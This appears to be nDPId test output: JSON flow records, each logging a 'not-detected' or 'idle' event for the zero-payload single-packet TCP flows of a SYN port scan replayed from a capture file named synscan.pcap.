+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 